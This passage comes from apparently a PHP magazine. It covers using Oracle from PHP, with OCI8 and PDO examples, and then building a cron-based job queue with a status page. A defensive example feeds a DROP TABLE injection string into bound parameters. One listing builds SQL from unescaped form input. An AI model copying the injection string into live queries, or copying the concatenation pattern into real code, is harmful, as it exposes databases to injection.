  --for the IMG_ID column inside the query
  PROCEDURE SP_GET_IMAGE (p_img_id IN NUMBER, my_cursor OUT my_ref_cursor) AS
  BEGIN
    OPEN my_cursor FOR
      SELECT IMG_BIN, MIME_TYPE, FILE_NAME, WIDTH, HEIGHT, SHORT_DESC
      FROM web.DB_IMAGE_LIBRARY
      WHERE IMG_ID = p_img_id;
  END SP_GET_IMAGE;
END;
/
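The difference in stored procedure call syntax described above can be isolated in one small helper. The following is a minimal sketch and not part of ADOdb or PDO: the function name buildProcedureCall(), the driver labels 'oci' and 'mysql', and the MySQL procedure name sp_get_image are assumptions chosen for illustration. It only builds the statement text with named placeholders; preparing, binding and executing are left to whichever API is in use.

```php
<?php
// Hypothetical helper: builds the driver-specific text for a stored procedure call.
// Oracle wraps the call in an anonymous PL/SQL block, MySQL uses CALL.
function buildProcedureCall($driver, $procedure, array $paramNames)
{
    $placeholders = array();
    foreach ($paramNames as $name) {
        $placeholders[] = ':' . $name;      // named placeholder, bound later
    }
    $args = implode(', ', $placeholders);

    switch ($driver) {
        case 'oci':
            return 'BEGIN ' . $procedure . '(' . $args . '); END;';
        case 'mysql':
            return 'CALL ' . $procedure . '(' . $args . ')';
        default:
            throw new InvalidArgumentException('Unsupported driver: ' . $driver);
    }
}

$oracleCall = buildProcedureCall('oci', 'PKG_IMAGE_MGMT.SP_GET_IMAGE', array('img_id', 'my_cursor'));
$mysqlCall  = buildProcedureCall('mysql', 'sp_get_image', array('img_id'));
echo $oracleCall, "\n";
echo $mysqlCall, "\n";
```

Keeping this one branch in a single function means the rest of the application can stay database-neutral, although the procedures themselves still have to be written once per database.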
Stored Procedures, Functions, Indexes and Views

In order to take advantage of Oracle’s security features and speed, it is best to use stored procedures and functions because these modules are internal to the Oracle database. They can be written either in Oracle’s proprietary PL/SQL language or in Java. PL/SQL is a block-structured procedural language whose syntax is modeled on Ada. It is relatively easy to learn the syntax. Because it is native to Oracle, performance is improved: stored code is compiled once and kept in the database, so it does not have to be compiled again before each call. As much business logic as possible should be left to the database in the form of stored procedures because the database is generally better suited to cross-referencing large amounts of data than PHP (or any other web scripting language).

Procedures are best used to promote reusability and to encapsulate complex business logic. In the university alumni portal example mentioned earlier, a single procedure could be used to provide all of the user information required to display the page. Also, the same database logic may be required in several places, and keeping it in a procedure encourages code reuse. For example, if your database contains a procedure that returns next week’s schedule for an employee, you can avoid constructing the query, adjusting the date, validating the individual and formatting the data by simply calling the procedure with certain parameters.

When calling a stored procedure from PHP, the statement is first parsed, data is bound and then the statement is executed. The same parsed statement can be used over again with different variables bound to it. Oracle functions have the same basic qualities as Oracle stored procedures, except that a function returns exactly one value and, by convention, takes no OUT parameters.
Another advantage of using stored procedures and functions is that variables are “bound” which means that because an input variable is not being used to form the SQL statement, the contents of a variable can be inserted directly into a table. This helps prevent SQL injections and frees the programmer from worrying about escaping quotes because this work is offloaded to the driver.
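The parse, bind, execute sequence can be tried out without an Oracle server. The sketch below makes one loud assumption: an in-memory SQLite database, reached through PDO, stands in for Oracle so that the example is self-contained, and the table and column names are made up. With the OCI8 functions the same three steps would be OCIParse(), OCIBindByName() and OCIExecute().

```php
<?php
// Sketch only: an in-memory SQLite database stands in for Oracle so that the
// example runs without a server. The table and column names are made up.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tbl_names (first_name TEXT, last_name TEXT)');

// Parse once: the statement text contains placeholders, never user input.
$insert = $db->prepare(
    'INSERT INTO tbl_names (first_name, last_name) VALUES (:first, :last)'
);

// Bind and execute several times with different values.
$people = array(
    array('Liz', "O'Brien"),                          // embedded quote, no escaping needed
    array('Robert', "x'); DROP TABLE tbl_names;--"),  // hostile input stays plain data
);
foreach ($people as $person) {
    $insert->bindValue(':first', $person[0]);
    $insert->bindValue(':last', $person[1]);
    $insert->execute();
}

$count = (int) $db->query('SELECT COUNT(*) FROM tbl_names')->fetchColumn();
$lastNames = $db->query('SELECT last_name FROM tbl_names ORDER BY rowid')
                ->fetchAll(PDO::FETCH_COLUMN);
echo $count, " rows stored\n";
```

Both values arrive in the table exactly as supplied, because the driver sends them separately from the statement text instead of splicing them into it.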
Oracle-Specific Features

Virtual Private Database (VPD), also called fine-grained access control or row-level security, is a feature unique to Oracle that gives database administrators an extra set of tools that not only set user rights for a table but also define permissions for specific rows in a table. This feature was introduced in Oracle 8i and is available in all later versions. When used with Oracle’s “application context”, it ensures that each user sees a different data set while using the same SQL code. This provides a more manageable approach to security when developing for the web (see Figure 2).

A major advantage of the VPD is that code does not have to be rewritten for each type of database user, as each is given a set of access rights based on their context. The VPD essentially appends a WHERE clause to the end of each query. For example, a company may have regional offices, and each regional office will only be able to view data that relates to its specific region, even though all offices are querying the same data set. A database can then be constructed so that all offices will be able to access data in the same table, but queries to that table will only return data as it relates to the individual office. With fine-grained access control, an application can be written using standard SQL queries and output the data according to the privileges of the user requesting the data. Maintenance is also easier because it reduces the amount of code and simplifies the design.

The “column masking” feature of the VPD also allows the database administrator to show or hide data from specific columns. In the previous example, a query like SELECT * FROM TBL_EMPLOYEES may return names, email addresses, fax numbers, etc., for all employees when performed by users in regional offices, while the head office users may also see a column for salaries. Oracle 9i introduced a new tool called policy manager that provided a GUI for managing and setting up row-level security.

The steps involved in setting up a VPD are as follows:

1. Define business rules. This implies creating a set of guidelines that determine which users are permitted to view the data and dictate how that data will be manipulated.
2. Set up roles, create users and grant roles to the users’ accounts.
3. Create the VPD policy function. This is the function that is called whenever the table is accessed. It returns a string that is essentially appended to the query’s WHERE clause. Oracle calls this string “the dynamic access predicate.”
4. Apply the policy to the table being accessed by registering the policy function or procedure using DBMS_RLS.
5. Apply the application context when the user logs in. This application context will then be passed to the policy when a table is accessed and the resulting recordset will be based on the permissions applied in the policy function.

Managing Multiple Database Names

You should manage multiple database names in Oracle’s tnsnames.ora file, not in PHP. The OCI8 login function OCILogon() requires a username and password. The third parameter is the host database. A development environment in a larger enterprise may have a development web server, a testing web server and a production web server. Each server may connect to a different database. The test and development servers may connect to a test database while the live web server will always connect to a live database. Problems may arise when moving PHP code from one server to another because there may be a line of code placed on a web server that connects it to the wrong database.

For example, when we test our code, we put an application in beta and we move it from the development web server to the test web server, where users may try to find bugs in the system. The test environment will use the same database as the development environment. Once testing has been completed, the code is transferred to the production server. We wanted to avoid having to make changes to the code before we moved it to production, so we decided to leave all of the settings that were unique to the server on the server. That is, the PHP code should always remain the same but the tnsnames.ora files can vary from server to server.
Put Oracle and PHP on Separate Servers

If you spend the money for an Oracle license, then it would be a good idea to put the database on a separate piece of hardware. A dedicated database server essentially implies that the server is used solely by one database application. This gives the advantage of higher speed and better database performance because the processing power will not have to be shared with other server applications. PHP should be on a separate server from the database, primarily for maintainability: upgrades and patches will need to be applied to both PHP and Oracle as they become available, and if the web server needs to be rebooted there is no reason to also take down the database server. If you do decide to use a remote database, you must install an Oracle client, such as the Oracle Instant Client, on your PHP server and then configure it to access the database.

As the database grows larger, Oracle database servers can be clustered to handle the requests. Clustering is accomplished by installing an add-on called Real Application Clusters (RAC), which was originally developed for Oracle 9i. With this feature, an Oracle database can run any application across a set of clustered servers. If one server fails, the application will continue running on the remaining servers, and another server can be added without shutting down the ones that are still functioning.

Handling Large Objects

One of the strengths of Oracle is its ability to handle large amounts of data. There are four LOB data types. Character Large Objects (CLOB and NCLOB) can hold up to 4 GB of character data; Binary Large Objects (BLOB) store up to 4 GB of binary data; and BFILEs are stored separately on the server’s filesystem and are limited in size only by the operating system.

These data types become useful when the database is used to store large binary or character objects. The CLOB field is especially useful because it can be searched. Larger enterprise databases can make heavy use of these features because the database can then act as a file server with built-in security. Using the database to store binary data eliminates the need to duplicate security policies across server types.

Let’s use an image server as an example. Normally, a website would keep images on the web server in a folder off of the root folder. Often, as the number of images increases so does the number of folders under it. But what happens when you have several thousand images that must be stored, searched and categorized? An image library may contain several thousand images consisting of everything from buttons, banners and icons that people use for web pages to mug shots of employees to stock photos. Some of the photos may need to have security rights attached to them so that users do not infringe on any copyright laws by using images that are not supposed to be publicly available.

One method of keeping track of the images that I have seen is to assign a unique identifier in a database table and associate it with a path to the location of the image on the file server or web server. In this situation there is an obvious problem with data integrity because nothing ties the location of the file to the database record. If a folder or a file were moved then the database record would become invalid.
Oracle stores a pointer in the table to the place in the data store where the actual data is located. The LOB data storage is defined by specifying a separate storage clause in the create table command. In Listing 2, the LOB clause tells Oracle where to store that data, while the parameters for the STORAGE clause control the physical areas that the data object will use on the disk. Storing images in a database table ensures that data integrity is maintained and all of the attributes of the image relate directly to the image. With Oracle Virtual Private Database the PHP programmer is freed from worrying about which images should be permitted in each context. If the VPD context is set to allow access by the general public then a simple select query will return all of the images that have this attribute attached.

Oracle in PHP: Strengths and Weaknesses

One of the major strengths of using PHP for development is that support is offered through a large network of PHP developers who share problems and solutions in discussion forums, which are then made available to the general public. Support for the PHP/Oracle combination is harder to find than support for MySQL. This is why the support that Oracle is offering to PHP developers through the Oracle Technology Network is essential to the drive that Oracle is making towards supporting PHP. The Oracle Technology Network PHP Developer Center presents featured articles, forums and news related to Oracle/PHP programming.

The main market for PHP and Oracle is in an enterprise where Oracle has been the database of choice and there is an existing repository of database code that will need to be leveraged for the web. If an organization that is presently using an Oracle database for their internal operations is planning to provide data access through the web, they will need a simple means to develop applications that can access and present Oracle data. PHP fits the bill nicely in this context because it can be understood by a beginning programmer while at the same time offering the more complex object-oriented features that one would expect to see in languages such as Java.

Enterprises that wish to embark on web application development using PHP and Oracle benefit from a large pool of PHP expertise. As PHP database access becomes more standardized, through the introduction of a database abstraction layer or through the use of the new PDO functions, less emphasis will need to be placed on specific database knowledge on the web developer side, which will result in more rapid application development. These features, combined with Oracle’s data security, blend nicely to form a very robust and practical web application development environment.

<?php
//Presently, the steps required to make a database call are as follows:
//OCILogon() - Login to the Database, OCIParse() - Parse the SQL string,
//OCIExecute() - Execute the statement, OCIFetch() - Fetch Results
//(PHP 5 also provides these functions as oci_connect(), oci_parse(),
//oci_execute(), oci_fetch(), oci_result() and oci_error())

//set up database connection
$strUser = "scott";
$strPwd = "tiger";
$strDB = "(DESCRIPTION=
    (ADDRESS_LIST=
      (ADDRESS=(PROTOCOL=TCP)(HOST=my.hostname.domain.com)(PORT=1521))
    )
    (CONNECT_DATA=(SERVICE_NAME=theservice))
  )";

//login to database
$objDBConn = OCILogon($strUser, $strPwd, $strDB);

//test DB object
if($objDBConn){
  //construct query string
  $strSQL = "SELECT FIRST_NAME, LAST_NAME FROM PEOPLE.TBL_NAMES";
  //parse query string
  $objQuery = OCIParse($objDBConn, $strSQL);
  //execute SQL statement
  $objResult = OCIExecute($objQuery);
  //test SQL statement result
  if($objResult){
    //loop through query result set
    while(OCIFetch($objQuery)){
      echo OCIResult($objQuery, "FIRST_NAME");
      echo " ";
      echo OCIResult($objQuery, "LAST_NAME");
      echo "<br />";
    }//end while
  }else{
    //error in query
    $arrError = OCIError($objQuery);
  }//end objResult if
}else{
  //error in connection
  $arrError = OCIError();
}//end objDBConn if

if(isset($arrError)){
  echo "ERROR: ".$arrError['message'];
}

Connecting and executing the same SQL query with the new PDO API:

<?php
//set up database connection
$strUser = "scott";
$strPwd = "tiger";
//PDO_OCI DSN: "oci:" prefix, dbname in //host:port/service form
$strDB = "oci:dbname=//my.hostname.domain.com:1521/theservice";

try{
  $objDB = new PDO($strDB, $strUser, $strPwd);
  //report query failures as exceptions instead of a false return value
  $objDB->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
  //construct query string
  $strSQL = "SELECT FIRST_NAME, LAST_NAME FROM PEOPLE.TBL_NAMES";
  //the query runs inside the try block so that it is skipped if the connection fails
  foreach($objDB->query($strSQL) as $arrRow){
    echo $arrRow['FIRST_NAME'];
    echo " ";
    echo $arrRow['LAST_NAME'];
    echo "<br />";
  }
} catch (PDOException $objException){
  echo "ERROR: " . $objException->getMessage();
}
ROBERT MARK is a senior web and database programmer working at McGill University in Montreal, Quebec. He uses Oracle/PHP regularly.
FEATURE
Job Management with PHP & Cron
Certain tasks take a long time to complete, longer than the client and the server timeouts will allow. In this piece, we discuss how to build an admin page to create and monitor a job queue, and dress it up with nearly real-time status updates.
by MIKE DeWOLFE
PHP: 4+
O/S: Linux
CODE DIRECTORY: phpcron
TO DISCUSS THIS ARTICLE VISIT: http://forum.phparch.com/264

I have been working on a system to import 10,000 user profiles and 20,000 forum discussion messages, all coming from different sources. Some of the imports may have missing information that the system has to bring in through an external election system. Some of the imports may not work at all. The biggest consideration: each import job may take tens of minutes and create a lot of server load. The duration of each job is such that if it is launched from a web client, the response will time out before the job is complete. If a script times out before completion, some users may re-run the job and thereby cause problems. It is also difficult to assess which parts of the job have run and which parts remain to be processed.

I could have built a one-off script for my import jobs, but after the initial imports there will likely be more imports in the future. While I could be tasked to do the imports later, a clear tool that a non-programmer could use would be ideal.

We need a way to see the job progress without interrupting the script to output HTML. Once the server has received a request or generated a response to the client, the clock is ticking for an impending script timeout. By keeping the job script operating solely on the server without direct client interaction, the script can run for as long as necessary. In essence, you need a worker script and a supervisory script. On top of that, some sophisticated interaction between the client and the server will both save on bandwidth and make for a slick presentation. It’s not hard to pull off; it puts job tasks in the hands of non-programmers without giving them the keys to the server; and it has an immediacy and polish that will create a good “wow” factor from users.

To build this tool, you’ll need five components: the data (the database), two worker scripts, and two more scripts for show. The job script is launched by the cron job (and in turn by the cron daemon); the status editing page is built infrequently; the JavaScript does a lot of work, looking at the status of the jobs in progress. These rely on a source of continuity: a database to direct jobs and record job status changes. You may wish to add a log viewer (see “Job Log” and “Log Viewer” below).
The Data Structure

There are two primary tables in use: jobs and job_status. If you wish to track individual tasks of a job, you’ll need a job_log table as well. In this example, jobs is a table of its own, but in your application its role may be much more subdued or rolled into another part of your application.

jobs (Listing 1) holds the information about the jobs you wish to carry out. It’s packed with the data you need to run your automated jobs. It does not contain any information about status. As far as the running jobs are concerned, it is read-only. Your admin/display page can add records to jobs and alter them after the fact.

job_status (Listing 2) is the orchestration of this system. It has a 1 to 1 relationship with jobs. It holds a list of statuses, information about completed jobs, and information about jobs that are currently underway. The job script (see below) will write to this table frequently.

job_log (Listing 3) holds information about the individual elements of a given job. If this information isn’t desirable, leave out this table and its relevant code in the job_script.php script (in Listing 4).
The Job Script

At the core of this system is the main worker: the job script (Listing 4). The “job” can be whatever you decide to plug into a system like this. It could be something too large to allow for a proper request-response from the server, whether it’s a matter of the number of items to process, their complexity, or a combination of both. The job could be something from an external source that does not directly interact with the admin system. Examples: posts coming into a discussion system from users; a long duration script that is going out to search for many news feeds; remote resources challenge/response, etc.

In my case, I wrote a routine to process imported records bound for phpBB: large CSV files. The import job was very complex and specifically built for phpBB. In the example that I cite in this article, we are taking a list of database tables and inserting the values from those tables into another database table. It is a simple illustration of the concepts that you need to consider, and fits nicely into our cron-based system. Really, any of your server’s cron jobs could report their status to a database, and you can tap that database through the admin/display script to see when a cron job last ran and any notations as to that job’s status.

You could build a particular script to handle each job and write a handler for each individual job, but that means you’re opening up the crontab (the file that controls when and how often a particular job runs) for editing by a PHP script. Cron jobs are very important to the security and well-being of a web server, and because of that, I preferred not to give PHP the opportunity to open the crontab and edit jobs. I prefer to have the server call a single script, frequently. If this script is run without any pending jobs, only a small load is put on the server. Keeping the PHP script’s hands off of the crontab leaves a security door shut.

The Cron Job

Cron jobs are routine tasks that the server initiates at specific intervals. From a shell session, you can edit your cron job list by typing crontab -e. This puts the list of cron jobs into a text editor. Every job is declared with five slots for time (minute, hour, day of the month, month and weekday), followed by the command or application to execute along with any supporting arguments. Each time slot holds either a wildcard (*), which matches every possible minute, hour, day and so on, or specific values written as dash-joined ranges or comma-separated lists. This means you can set cron jobs to execute every minute of every day, or take some times and some days off.
LISTING 1

    CREATE TABLE jobs
    (
        job_id INT NOT NULL PRIMARY KEY AUTO_INCREMENT,
        processing_file VARCHAR(50),
        destination_file VARCHAR(50)
    );
LISTING 5 (excerpt; table markup reconstructed)

            if (!($result = mysql_query($sql))) {
                die("job update failed");
            }
            // this will only work on jobs that are not complete
            $sql = "UPDATE job_status SET `job_status` = '" . $input->job_status
                 . "' WHERE `job_status` < 2 AND job_id = " . $input->job_id;
            if (!($result = mysql_query($sql))) {
                die("job update failed");
            }
        }
    }

    // build page
    BuildHeader();
    $query = "SELECT DISTINCT *, job.job_id AS id
              FROM jobs job, job_status status
              WHERE job.job_id = status.job_id
              ORDER BY status.started DESC";
    if ($recordset = mysql_query($query)) {
        echo "<table><tr>";
        echo "\t<th>Processing</th>";
        echo "\t<th>Destination</th>";
        echo "\t<th>Complete?</th>";
        echo "\t<th>Status</th>";
        echo "\t<th></th>";
        echo "</tr>";
    } else {
        // doh! We have an error
        echo mysql_error();
    }
    while ($row = mysql_fetch_array($recordset)) {
        echo "<tr>";
        echo "\t<td>" . $row['processing_file'] . "</td>";
        echo "\t<td>" . $row['destination_file'] . "</td>";
        // parenthesize the ternary so it is evaluated before the concatenation
        echo "\t<td>" . (($row['job_status'] == 2) ? "yes" : "no") . "</td>";
        // status form fields
        // put in a form field to allow editing and then
        // HIDE it. A JavaScript will make it visible
        // ...
    }
After the timing comes the command call. If you want to execute a PHP script, call its interpreter (php) and use the absolute location of your job script as its argument. In our case, we want to call a single job script repeatedly and let the script look to a database for relevant jobs to run. If there are no eligible jobs to be executed, the brief execution of the script will come to a close. Then, the next time the crontab entry matches the current time, the script will be run again.
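To make the five time slots concrete, here is a minimal sketch in PHP of how a crontab time specification could be checked against a timestamp. The crontab entry in the comment uses a hypothetical interpreter path and script location, and cronFieldMatches() and cronMatches() are illustrative names, not part of cron or PHP. The sketch handles only the wildcard, dash-joined ranges and comma-separated lists; it ignores step values and names, and it simply requires all five slots to match, whereas real cron treats day-of-month and weekday specially when both are restricted.

```php
<?php
// Example crontab entry (paths are assumptions; adjust for your server):
//   * * * * * /usr/bin/php /home/example/phpcron/job_script.php
// The five slots are: minute, hour, day of month, month, weekday.

// Returns true if the integer $value satisfies one crontab time slot.
function cronFieldMatches($field, $value)
{
    if ($field === '*') {
        return true;
    }
    foreach (explode(',', $field) as $part) {
        if (strpos($part, '-') !== false) {
            // dash-joined range, e.g. 0-18
            list($low, $high) = explode('-', $part, 2);
            if ($value >= (int) $low && $value <= (int) $high) {
                return true;
            }
        } elseif ((int) $part === $value) {
            // single value from a comma-separated list
            return true;
        }
    }
    return false;
}

// Returns true if the five-slot $spec matches the given Unix timestamp.
function cronMatches($spec, $timestamp)
{
    $fields = preg_split('/\s+/', trim($spec));
    $now = array(
        (int) date('i', $timestamp), // minute
        (int) date('G', $timestamp), // hour
        (int) date('j', $timestamp), // day of month
        (int) date('n', $timestamp), // month
        (int) date('w', $timestamp), // weekday, 0 = Sunday
    );
    foreach ($fields as $i => $field) {
        if (!cronFieldMatches($field, $now[$i])) {
            return false;
        }
    }
    return true;
}
```

For example, cronMatches('* 0-18 * * 1-5', time()) is true only on weekdays between midnight and 18:59 local time.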
If you need to know more about how to build a crontab, take a look at http://www.mkssoftware.com/docs/man1/crontab.1.asp. It explains the intricacies of crontabs: how to edit them, review them and set them up in the first place. Another resource at http://www.csgnetwork.com/crongen.html can help you build a sensible crontab via a JavaScript tool.

Server load can affect your decision for when to run a cron job. If your server has a processing crunch at a peak time, it’s a good idea to give a load-intensive cron job a break at that time. You may ask yourself: are we really running a script every minute of every day? Well, yes. While that does mean 1440 calls per day, if there are no jobs waiting in the queue, the script runs, says “nothing to do” and exits. A minute later it does it again. You could run the script less often than every minute; or less often than every day (e.g. take Sundays off); or run it only during certain hours (e.g. hours 0-18, midnight to 6PM). The upside of less frequency is less server load. The downside of less frequency is reduced convenience. If your job makes a sweep every minute, then when an administrator sets a job in motion, they need only wait a minute or so to see it executed. If you went to a cron job that executed every five minutes (or 288 times per day), you would have to wait until the next cron job triggers. Again, it’s not a big deal: it’s a question of immediacy through frequency versus a lower overall server load through infrequency.

When the jobs are underway, an admin will want to monitor their status. There are two ways to accomplish this: 1) reload the entire admin screen to get a refreshed view of the progress; or 2) make some surreptitious calls to the server for status updates. “Quiet calls” to the server will load the same dataset as a full page refresh, but they can serve out much less HTML to update the client. Rather than refresh the whole page, the refresh occurs in a nearly invisible IFRAME (1 pixel x 1 pixel) that sits on the admin page. Instead of building HTML, the IFRAME contains JavaScript that calls functions in the parent page. When this frame page is loaded, the BODY onload() event calls a function that calls all of the update functions (see Listing 6). A meta-tag refresh will reload the frame page after so many seconds to trigger the event repeatedly, which will change the contents of the frame’s parent page.
How Much Work to Perform?

How many jobs should you process for each execution? That’s a good question, and there are two schools of thought. If you have the job script load all of the jobs that it is eligible to process, there are two side effects. First, you will have a dataset of jobs to process before script execution completes. If the administrator changes his mind at some point after the script begins to run, and before a particular job runs, it’s too late to delay or rethink the execution without going in and killing the main process. Second, if you don’t want a process to run for a long time, you may wish to give the worker job fewer tasks, as more tasks equate to a longer runtime.

My preference is to have each instance of the main script load and process a single job. This allows the worker script to tackle a smaller task and complete more quickly. On the downside, it means that if there are many jobs in the queue, you will have to wait many minutes before a newly-inserted task begins execution. In the end, it’s a matter of finesse. If jobs are likely to take more than a minute each, and you have your cron job set to execute the job script every minute, there is nothing to lose by executing only one job per iteration. If your jobs are expected to last less than one minute per execution, then you could either process all of the available jobs on each execution, or split the difference and limit the set of jobs to a smaller number (the number of jobs expected to take one minute).

Calling long duration scripts via the Linux/Unix cron mechanism means they launch quietly and they close quietly. As each is processed, its current status will be exhibited by updating certain fields in the job database table. Scripts can also log their output by writing to an activity log database table.
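The “split the difference” rule can be written down in a few lines. The following is only a sketch: jobsPerRun() and pendingJobsQuery() are hypothetical helpers, the per-job duration is your own estimate, and the WHERE clause assumes (based on the status page listing) that a job_status value below 2 means “not yet complete”.

```php
<?php
// Hypothetical helper: how many queued jobs to take on in one run.
// $expectedSeconds is your own estimate of how long one job takes;
// $intervalSeconds is the gap between cron runs (60 for every minute).
function jobsPerRun($expectedSeconds, $intervalSeconds = 60)
{
    if ($expectedSeconds <= 0) {
        return 1; // no usable estimate: fall back to one job per run
    }
    // Jobs longer than the interval still get one slot per run.
    return max(1, (int) floor($intervalSeconds / $expectedSeconds));
}

// A LIMIT built from that number leaves later jobs in the queue, so an
// administrator can still change them before they are picked up.
// Assumption: job_status < 2 marks jobs that are not yet complete.
function pendingJobsQuery($limit)
{
    return 'SELECT job_id FROM job_status WHERE job_status < 2 '
         . 'ORDER BY job_id LIMIT ' . (int) $limit;
}
```

With jobs expected to take about ten seconds each and a one-minute cron interval, jobsPerRun(10) yields 6; anything estimated at a minute or longer yields 1, which matches the one-job-per-iteration preference described above.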
Go, Caution, Stop

In the example job script, we’ll use three general result codes for each leg of the job script: green indicates that everything went well, yellow means that the job passed but there were problems, and red means that an action has failed. You may choose to use only two statuses (success or failure), or you may have more finely defined levels. Our three statuses are named “Status_Green”, “Status_Yellow” and “Status_Red”. These names are used as both variable names and database field names.

As each part of the job is processed, you could update the database, but I think that’s too intensive. Instead, my script keeps track of the $Status_Green, $Status_Yellow and $Status_Red results. It increments the appropriate variable by setting $Current_Status to “Status_Green”, “Status_Yellow” or “Status_Red”, and uses variable-variables to handle the switch. When you call $$Current_Status++ you increment either $Status_Green, $Status_Yellow or $Status_Red, depending on the value of $Current_Status. Then, every 50 iterations (when the count of processed items, the $pass variable, modulo 50 is equal to 0), it stops, does a database update to the “Status_” and “Total_Processed” fields for the currently-running job, using its job_id field as a key, resets the PHP variables, and continues processing. At the end of the processing, it does this update one more time, thus passing the remaining status updates into the database. This information isn’t used by the job script; it’s used by the JavaScript generation page to update the admin control panel page.
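The counting scheme can be sketched as follows. This is not the code from Listing 4: tallyStatuses() is a hypothetical function, the $flush callback stands in for the UPDATE against job_status, and the whitelist check is an addition of this sketch, since a variable-variable will otherwise increment whatever local variable the string happens to name.

```php
<?php
// Tallies per-item results and hands the counts to $flush every
// $batchSize items, then once more for any remainder.
// $flush stands in for the database UPDATE (an assumption of this sketch).
function tallyStatuses(array $results, $batchSize, $flush)
{
    $allowed = array('Status_Green', 'Status_Yellow', 'Status_Red');
    $Status_Green = $Status_Yellow = $Status_Red = 0;
    $pass = 0;

    foreach ($results as $Current_Status) {
        // Only touch the three counters, never another local variable.
        if (!in_array($Current_Status, $allowed, true)) {
            continue;
        }
        $$Current_Status++; // increments the variable named by the string
        $pass++;

        if ($pass % $batchSize == 0) {
            $flush($Status_Green, $Status_Yellow, $Status_Red);
            $Status_Green = $Status_Yellow = $Status_Red = 0;
        }
    }

    // Final update for whatever has accumulated since the last flush.
    if ($Status_Green + $Status_Yellow + $Status_Red > 0) {
        $flush($Status_Green, $Status_Yellow, $Status_Red);
    }
    return $pass;
}
```

Passing a closure that appends its arguments to an array is an easy way to watch the batches go by; in a real job script the callback would add the counts to the current job’s row instead.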
Job Log

For each job, you may wish to see a quick notation about what happened during execution. This data is nice when your script succeeds, but it’s critical when something fails. Writing a note to a log will slow down processing slightly, but if you consider that a fair tradeoff, then each part of a job should be annotated with a log entry. With the log available, the status/editing page can link to the current log for a particular job. In the example job script (Listing 4), you can see the job log insert statement.
The Display/Management Page

The admin user will see the status page. For all intents and purposes, it’s the only visible part of this tool. It loads data from the import job page, along with the current set of statuses, by joining two tables: jobs and job_status. Hidden on this page is an iframe, 1 pixel by 1 pixel in size. This connects another document to the admin page, but the secondary document is effectively invisible. The parent and iframe documents can communicate with each other through JavaScript. The iframe document can refresh frequently, and the parent page appears static even though its data is changing in real time through function calls spawned from the nested frame.

The status display page is very simple in its functionality; it lists all of the jobs available in the database, and the script contains a means to update existing jobs or insert new ones. As you see fit, you can elaborate on the functionality to suit your own purposes. If we have form input available, the form data will be passed to the UpdateData($input) function. If there is an $input[‘job_id’] available, it will perform an update. If there is no positive id number, it will insert a new job into the jobs table.

In this example, a joined SELECT from the jobs and job_status tables yields all of the information we need to build the initial page with proper values and statuses. The code shown in Listing 5 takes a database row and passes that array to the BuildFormCells($object) function. This function uses the input to create HTML for output (and the edit form).
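The update-or-insert decision made by UpdateData($input) might look roughly like the sketch below. buildJobQuery() is a hypothetical helper, not the function from Listing 5, and it swaps the listing’s string concatenation for named placeholders of the kind PDO prepared statements accept, so that form input never lands in the SQL text. The column names come from Listing 1.

```php
<?php
// Hypothetical helper in the spirit of UpdateData(): decides between
// UPDATE and INSERT and returns the SQL plus its bound parameters.
function buildJobQuery(array $input)
{
    $params = array(
        ':processing'  => isset($input['processing_file']) ? $input['processing_file'] : '',
        ':destination' => isset($input['destination_file']) ? $input['destination_file'] : '',
    );
    $jobId = isset($input['job_id']) ? (int) $input['job_id'] : 0;

    if ($jobId > 0) {
        // A positive id means the job already exists: update it.
        $params[':job_id'] = $jobId;
        $sql = 'UPDATE jobs SET processing_file = :processing, '
             . 'destination_file = :destination WHERE job_id = :job_id';
    } else {
        // No positive id: create a new job.
        $sql = 'INSERT INTO jobs (processing_file, destination_file) '
             . 'VALUES (:processing, :destination)';
    }
    return array($sql, $params);
}
```

The returned pair can be handed to whatever database layer you use; with PDO that would be a prepare() followed by execute($params).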
Objects in Use

For each line item, there are two form objects. For each job, one form contains the status information. The second form is for inline editing of a job’s settings, which we’ll get to a little later. The status information form uses a form object as a container, because that has the most widespread adoption. True, you could use DIV tagged elements and alter the innerHTML of objects, but as you degrade through browser flavors and versions, this functionality will start to get spotty. Forms can be addressed by everything from Netscape 2.0 and IE 3.0 onward. Through CSS, you can dress up form elements like text fields to look like inline text, right down to allowing only the embedded JavaScript to alter the input fields. Best of all, you can implant text in text boxes, which makes them much more versatile than graphical status bars.
Getting Graphic

In addition to altering form field contents, we’ll look at two ways to achieve a more graphic look for your status updates. You can either use a graphic (an image tag) and change it as the status changes, or you can change the CSS dimensions of the form field to reflect the progress of your job script. The CSS method is nice because once you open up the crayon-box of directives, you can change background color, visibility, size and font face from the source. Nevertheless, let’s discuss both options.

To make an image into a representative status bar, you need to make its size relative to the page. In addition to positioning the image on the page, you need to name it appropriately. In this example, the graphical bars are named “status_[id#]_[color]img”. We immediately make the image invisible. While the form elements are inside of their form’s container object, the images are free-floating references within the document itself, so you want the names to reflect specific pieces of data. The three images for a job are created inside a <nobr> element.

The <nobr> will snug the three images next to each other, allowing no part of the bar to wrap down to the next line. The images won’t actually show up, because the style has been set to not be visible. After the first invocation of “UpdateStatus()”, eligible bars will appear on the status page. You’ll also need to add the JavaScript code from Listing 5.

Perhaps you want to trick out the functionality of the graphic display even further? Here’s an example of how to do it. What if you wanted to indicate that having more than 20 red statuses is bad? One way to show off a dire situation is to change the image source for one of the status bars based on the status. Again, there’s JavaScript in Listing 5 to allow this (look for the part that changes the image’s src to skulls.jpg). When the status changes for the worse, the image source changes; when it improves, it can change back. While in this particular example red > 20 is the qualifier, you may want the trigger to be red > green or red > (green + yellow), meaning that a majority of the job has gone bad.

    if (red > 20) {
        document.getElementById("status_" + id + "_redimg").src = "skulls.jpg";
    } else {
        document.getElementById("status_" + id + "_redimg").src = "red.jpg";
    }

Changing the CSS is just as simple to pull off. Another graphic option is to change the background image, based on the overall status of your jobs.
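The image markup described in this section can be generated from PHP along the following lines. Treat it as a sketch under assumptions: buildStatusImages() is a hypothetical helper, green.jpg and yellow.jpg are placeholder file names (only red.jpg and skulls.jpg appear in the article), the starting dimensions are arbitrary, and the images carry both a name and an id so that document.getElementById() can find them.

```php
<?php
// Builds the three hidden status-bar images for one job.
// File names other than red.jpg are placeholders chosen for this sketch.
function buildStatusImages($jobId)
{
    $jobId = (int) $jobId;
    $html = '<nobr>';
    foreach (array('green', 'yellow', 'red') as $color) {
        // Naming scheme from the article: status_[id#]_[color]img
        $name = 'status_' . $jobId . '_' . $color . 'img';
        $html .= '<img src="' . $color . '.jpg" name="' . $name . '" id="' . $name . '"'
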